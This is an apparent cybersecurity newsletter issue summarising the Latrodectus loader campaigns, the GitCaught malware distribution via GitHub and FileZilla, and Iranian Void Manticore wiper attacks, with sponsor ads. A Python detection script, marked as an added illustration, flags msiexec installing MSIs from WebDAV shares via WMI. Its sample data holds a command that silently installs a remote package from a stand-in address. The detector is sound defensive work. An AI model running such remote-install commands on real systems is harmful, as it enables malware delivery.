May 21 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that's rolling like thunder, deep cyber-under
Today's hottest cybersecurity news stories:
You're as cold as IcedID, you're willing to Latrodectus
Malware cocktail delivered via GitHub and FileZilla
Albania, Israel targeted by MOIS-linked hackers baby
Cybersecurity researchers have observed a surge in email phishing campaigns since early March 2024, delivering a nascent malware loader named Latrodectus. This malware is believed to be the successor to the infamous IcedID malware.
Infection Chain
The campaigns typically use oversized JavaScript files that abuse WMI to invoke msiexec.exe, which installs a remotely hosted MSI file from a WebDAV share. Latrodectus, designed to deploy additional payloads such as QakBot, DarkGate, and PikaBot, lets threat actors carry out a range of post-exploitation activities.
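As an added illustration (not code from the newsletter or the research it summarises), the following detection runs over constructed process-creation events and flags the delivery pattern described above: msiexec.exe launched through WMI to install an MSI from a WebDAV/UNC path or URL. The Sysmon-style field names, the sample events and the scoring heuristic are all assumptions.

```python
"""Flag process-creation events matching the msiexec-from-WebDAV-via-WMI chain.
Sample events and the heuristic below are constructed for illustration."""
import json
import re

# msiexec installing from a UNC path (\\host@80\share\x.msi is the WebDAV form)
# or from a URL, rather than from a local file.
REMOTE_MSI = re.compile(r"(?i)(\\\\[^\s\\]+\\|https?://)\S*\.msi\b")
# Processes created via WMI (Win32_Process.Create) are children of WmiPrvSE.exe.
WMI_HOST = "wmiprvse.exe"

def score_event(ev):
    """Return the reasons an event looks suspicious (empty list = benign)."""
    reasons = []
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = ev.get("CommandLine", "")
    if image != "msiexec.exe":
        return reasons
    if REMOTE_MSI.search(cmd):
        reasons.append("msiexec installing MSI from remote location")
    if parent == WMI_HOST:
        reasons.append("msiexec spawned via WMI provider host")
    if re.search(r"(?i)\s/q[nb]?\b", cmd):  # silent/quiet install switch
        reasons.append("silent install flag")
    return reasons

def detect(lines):
    """Parse JSON-lines process events; return (RecordId, reasons) for hits."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["RecordId"], reasons))
    return hits

# Constructed sample events (not real telemetry; 203.0.113.10 is a TEST-NET address).
SAMPLE_EVENTS = [
    json.dumps({"RecordId": 1, "Image": r"C:\Windows\System32\msiexec.exe",
                "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                "CommandLine": r"msiexec.exe /i \\203.0.113.10@80\share\update.msi /qn"}),
    json.dumps({"RecordId": 2, "Image": r"C:\Windows\System32\msiexec.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"msiexec.exe /i C:\Users\u\Downloads\7zip.msi"}),
    json.dumps({"RecordId": 3, "Image": r"C:\Windows\System32\wscript.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"wscript.exe C:\Users\u\Downloads\invoice.js"}),
]

if __name__ == "__main__":
    for rid, why in detect(SAMPLE_EVENTS):
        print(f"RecordId {rid}: " + "; ".join(why))
```

Only the first sample event (remote MSI, WMI parent, quiet switch) is flagged; a local interactive MSI install is not.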
Advanced Features
Latrodectus boasts several sophisticated features:
Enumeration and execution capabilities
Self-delete technique for erasing running files
Masquerades as legitimate software libraries
Obfuscates source code and performs anti-analysis checks to evade debugging and sandbox environments
Sets up persistence on Windows hosts using a scheduled task
Communicates with a C2 server over HTTPS for commands such as collecting system information, updating, restarting, and executing files
New Commands
Recent updates include commands to enumerate files in the desktop directory and retrieve the entire running process ancestry from infected machines. Although designed to download and execute IcedID, this behaviour hasn't been detected in the wild.
Potential Successor to IcedID
Researchers hypothesise that Latrodectus might be developed as a replacement for IcedID, given their development connections and similar functionalities.
Other Phishing Campaigns
In addition to Latrodectus, other notable phishing campaigns have been observed:
DarkGate Malware: Using QuickBooks invoice-themed emails, phishing campaigns lead users to a malicious JAR file, executing a PowerShell script to download and launch DarkGate via an AutoIT script.
Phishing-as-a-Service (PhaaS): An updated platform called Tycoon targets Microsoft 365 and Gmail session cookies, bypassing MFA protections with enhanced detection evasion techniques.
D3F@ck Loader: Propagated through Google ads impersonating Calendly and Rufus, this loader drops Raccoon Stealer and DanaBot. It illustrates the evolving MaaS landscape, utilising Extended Validation certificates to bypass trusted security measures.
Emerging Threats
New stealer malware families like Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer are also on the rise. The Remcos RAT has been spotted using a PrivateLoader module to enhance its capabilities, employing VB scripts, altering the registry, and setting up services to remain undetected.
Conclusion
The spike in Latrodectus campaigns and other phishing threats underscores the ever-evolving landscape of cyber threats. Organisations must stay vigilant, employ robust security measures, and educate users on phishing risks to mitigate these sophisticated attacks.
A sophisticated campaign has been observed leveraging legitimate services like GitHub and FileZilla to distribute a variety of stealer malware and banking trojans, including Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo. The malware is disguised as credible software such as 1Password, Bartender 5, and Pixelmator Pro.
Broad Targeting Strategy
Recorded Future's Insikt Group, tracking the activity under the moniker GitCaught, notes that the presence of multiple malware variants indicates a broad cross-platform targeting strategy. The use of overlapping C2 infrastructure suggests a centralised command setup, enhancing the efficiency of the attacks.
Attack Chains
Attackers use fake profiles and repositories on GitHub to host counterfeit versions of popular software. These malicious files are embedded within various domains and distributed via malvertising and SEO poisoning campaigns.
Malware Management
The threat actors, suspected to be Russian-speaking from the Commonwealth of Independent States (CIS), also utilise FileZilla servers for managing and delivering malware. Analysis reveals that the campaign, active since at least August 2023, aims to deliver malware such as RedLine, Lumma, Raccoon, Vidar, Rhadamanthys, DanaBot, and DarkComet RAT.
Rhadamanthys Pathway
Victims who visit fake application websites are redirected to payloads hosted on Bitbucket and Dropbox, indicating a wider abuse of legitimate services.
Ongoing Threats
Microsoft's Threat Intelligence team has highlighted the ongoing threat of the macOS backdoor codenamed Activator. Distributed via disk image files impersonating cracked software, Activator steals data from Exodus and Bitcoin-Qt wallet applications. It prompts users for elevated privileges, disables macOS Gatekeeper and Notification Center, and deploys malicious Python scripts for persistence.
Key Points
Campaign Name: GitCaught
Malware Variants: Atomic (AMOS), Vidar, Lumma (LummaC2), Octo, RedLine, Raccoon, Rhadamanthys, DanaBot, DarkComet RAT
Distribution Methods: Fake GitHub profiles, malvertising, SEO poisoning, Bitbucket, Dropbox
Target Platforms: Android, macOS, Windows
Threat Actors: Suspected Russian-speaking from CIS
Conclusion
This campaign underscores the growing trend of cybercriminals misusing legitimate services to orchestrate attacks. Organisations and individuals must remain vigilant, employing robust cybersecurity measures to protect against these sophisticated threats.
Stay ahead of the curve with Presspool.ai! Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." That's us, alright! How about you? Visionary AI executive, much?
And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business
Rest assured, the process is very straightforward.
You simply:
Sign Up & Create Campaign
Define your audience, budget, and message to captivate your audience.
Launch your campaign, as Presspool's AI matches it with ideal newsletter audiences for optimal reach and conversions.
Finally, you leverage real-time analytics to track performance and refine future strategies. Elevate your marketing game and stay informed with Presspool.ai! Simples!
Presspool.ai may just have what you need to succeed. And if the product isn't for you, the newsletter alone is a gamechanger. And we know newsletters
Destructive wiping attacks targeting Albania and Israel have been attributed to an actor affiliated with the Ministry of Intelligence and Security (MOIS). The campaigns are conducted under the personas Homeland Justice and Karma, respectively.
Threat Group
Cybersecurity firm Check Point tracks this activity under the name Void Manticore, also known as Storm-0842 by Microsoft. The group shows significant overlap with another Iranian group, Scarred Manticore (aka Storm-0861).
Attack Patterns
Void Manticore is known for:
Albania (since July 2022): Homeland Justice campaigns utilising bespoke wiper malware like Cl Wiper and No-Justice (LowEraser).
Israel (post-October 2023): Following the Israel-Hamas war, targeting Windows and Linux systems with wiper malware called BiBi, attributed to the pro-Hamas hacktivist group Karma.
Tactics and Techniques
The attack chains are straightforward, leveraging:
Publicly available tools
Remote Desktop Protocol (RDP)
Server Message Block (SMB)
File Transfer Protocol (FTP)
Initial access often exploits known vulnerabilities in internet-facing applications, such as CVE-2019-0604. Successful breaches are followed by the deployment of web shells, including Karma Shell, which masquerades as an error page while providing various malicious capabilities.
Collaboration Between Threat Groups
Void Manticore appears to use access previously obtained by Scarred Manticore for its operations, suggesting a systematic handoff of targets. Microsoft's investigations into attacks on Albanian governments in 2022 indicated cooperation among multiple Iranian actors:
Storm-0861: Initial access and data exfiltration
Storm-0842: Ransomware and wiper malware deployment
Storm-0166: Further data exfiltration
Storm-0133: Probing victim infrastructure
Storm-0861 is linked to APT34 (Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, OilRig), known for wiper malware like Shamoon and ZeroCleare.
Check Point's Insights
Check Point highlights that:
Techniques overlap in attacks against Israel and Albania, indicating routine coordination.
Void Manticore's dual approach combines psychological warfare with data destruction, amplifying the impact on targeted organisations.
This ongoing cooperation and strategic coordination between Iranian cyber actors underscore the sophisticated nature of these campaigns.
Extra, Extra! Read all about it!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday
Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders.
Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future
Let us know what you think.
So long and thanks for reading all the phish!